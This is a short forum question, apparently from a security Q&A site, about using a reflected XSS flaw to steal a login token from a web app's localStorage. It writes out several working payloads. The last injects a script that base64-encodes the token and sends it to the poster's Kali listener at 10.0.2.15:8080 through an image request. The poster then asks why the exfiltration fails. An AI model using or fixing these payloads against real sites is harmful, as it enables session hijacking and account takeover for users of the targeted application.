how to send cookies or token in local storage to a remote server using reflected XSS
I have an XSS vulnerability identified by <script>alert(1);</script> in the url.
So when I put it in the url it gets executed (ex: www.example.com/admin/<script>alert(1);</script> ).
I also tried after loggin in, and noticed the token is being saved in local storage, so I was able to print it using this script: www.example.com/admin/<script>alert(localStorage.getItem("key"))</script>
Now I want to go further and see how this token, that I was able to print, to send it to a remote server.
I found this quick tutorial: https://pswalia2u.medium.com/exploiting-xss-stealing-cookies-csrf-2325ec03136e, and I tired to do the classic way which seems simple and starigh forward. On kali I launched an http server listening on port 8080. And on my host which has ping to kali, I opened the browser and I put in the url the script, but I adjusted it to get the token instead of cookie (because in my case I want to token which is saved in local storage)
This is the script I adjusted:
<script>var i=new Image(); i.src="http://10.0.2.15:8080/?token="+btoa(localStorage.getItem("key"));</script>
so the final link will be:
www.example.com/admin/<script>var i=new Image(); i.src="http://10.0.2.15:8080/?token="+btoa(localStorage.getItem("key"));</script>
when running this I dont receive anything on the kali server listening on port 8080, am I missing anything ?
